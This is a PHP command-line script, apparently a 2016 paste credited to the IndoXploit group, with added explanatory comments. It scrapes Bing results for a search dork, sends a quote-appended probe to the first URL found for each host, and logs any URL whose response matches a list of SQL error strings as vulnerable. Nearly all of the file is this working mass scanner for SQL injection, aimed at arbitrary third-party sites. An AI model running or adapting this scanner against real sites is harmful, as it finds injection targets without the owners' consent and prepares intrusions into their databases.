AgusSR

SQL Dork Scanner via Bing Dorker [ CLI ]

Oct 29th, 2016
  1. <?php
  2. // SQL Scanner via Bing Dorker
  3. // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit
  4. // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew
  5. // usage: php sql.php 'bing_dorker'
  6. // ex: php sql.php '"page.php?id=1" site:it'
  7.  
// Runtime setup for a long, unattended command-line run.
set_time_limit(0);                 // remove PHP's execution time limit
error_reporting(0);                // hide every PHP notice and warning, including the ones this script triggers itself
@ini_set('memory_limit', '64M');
// header() only has an effect under a web SAPI; the usage line above runs this file from the CLI.
@header('Content-Type: text/html; charset=UTF-8');
  12.  
  13. function cover() {
  14.     print " ******        SQL Scanner via Bing Dorker         ******\n";
  15.     print " *****      Coded by l0c4lh34rtz - IndoXploit       *****\n";
  16.     print " ****  Sanjungan Jiwa - Jancok Sec - Res7ock Crew    ****\n";
  17.     print " ***          usage: php sql.php 'bing_dork'          ***\n";
  18.     print " **    ex: php sql.php '\"page.php?id=1\" site:it'       **\n\n";
  19. }
  20. $error[] = 'You have an error in your SQL';
  21. $error[] = 'supplied argument is not a valid MySQL result resource in';
  22. $error[] = 'Division by zero in';
  23. $error[] = 'Call to a member function';
  24. $error[] = 'Microsoft JET Database';
  25. $error[] = 'ODBC Microsoft Access Driver';
  26. $error[] = 'Microsoft OLE DB Provider for SQL Server';
  27. $error[] = 'Unclosed quotation mark';
  28. $error[] = 'Microsoft OLE DB Provider for Oracle';
  29. $error[] = 'Incorrect syntax near';
  30. $error[] = 'SQL query failed';
  31. $error[] = 'Warning: filesize()';
  32. $error[] = 'Warning: preg_match()';
  33. $error[] = 'Warning: array_merge()';
  34. $error[] = 'Warning: mysql_query()';
  35. $error[] = 'Warning: mysql_num_rows()';
  36. $error[] = 'Warning: session_start()';
  37. $error[] = 'Warning: getimagesize()';
  38. $error[] = 'Warning: mysql_fetch_array()';
  39. $error[] = 'Warning: mysql_fetch_assoc()';
  40. $error[] = 'Warning: is_writable()';
  41. $error[] = 'Warning: Unknown()';
  42. $error[] = 'Warning: mysql_result()';
  43. $error[] = 'Warning: pg_exec()';
  44. $error[] = 'Warning: require()';
  45.  
  46. function getsource($url) {
  47.     $curl = curl_init($url);
  48.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  49.     $content = curl_exec($curl);
  50.     curl_close($curl);
  51.     return $content;
  52. }
  53. function inject($url) {
  54.     $data = getsource(str_replace("=", "='", $url));
  55.     $errors = implode("|", $GLOBALS['error']);
  56.     return preg_match("#{$errors}#i", $data);
  57. }
  58. function simpen($isi) {
  59.     $f = fopen("result_sql.txt","a+");
  60.     fwrite($f, "$isi\n");
  61.     fclose($f);
  62. }
  63.  
// Main flow: page through Bing results for the search phrase in $argv[1],
// collect the result links, then send one probe per distinct host via inject().
//
// The phrase is URL-encoded before the isset() check below, so with no argument
// $argv[1] is read while undefined (the notice is hidden by error_reporting(0)).
$do = urlencode($argv[1]);
if(isset($argv[1])) {
    cover();
    $npage = 1;         // value sent as Bing's "first" parameter (result offset)
    $npages = 30000;    // upper bound for that offset
    $allLinks = array();
    $lll = array();     // never read anywhere in this file
    while($npage <= $npages) {
        // One result page per iteration, requested over plain HTTP.
        $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
        if($x) {
            // Links are scraped from the HTML with a regex tied to the result
            // markup (<h2><a href="..." h="ID...), so this breaks if that markup differs.
            preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
            foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
            $npage = $npage + 10;
            // Stop paging when the page holds no link to the next offset.
            if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
        } else break;
    }
    foreach($allLinks as $url) {
        // Reduce each link to "http://host/" and use that as the de-duplication key.
        $urls = parse_url($url, PHP_URL_HOST);
        $urls = "http://$urls/";
        // $_SESSION serves as a plain "hosts already seen" array; session_start()
        // is never called in this file, so nothing is persisted between runs.
        if($_SESSION[$urls]) {
            //
        } else {
            $_SESSION[$urls] = "1";
            // Only the first collected URL of each host is probed. A hit means the
            // response matched an error string in inject(); nothing else is verified
            // before the URL is printed and appended to result_sql.txt.
            if(inject($url)) {
                print " $url -> Vuln!!\n";
                simpen($url);
            }
        }
    }
} else {
    print "usage: php ".$argv[0]." 'bing_dork'\n";
    print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n";
}
?>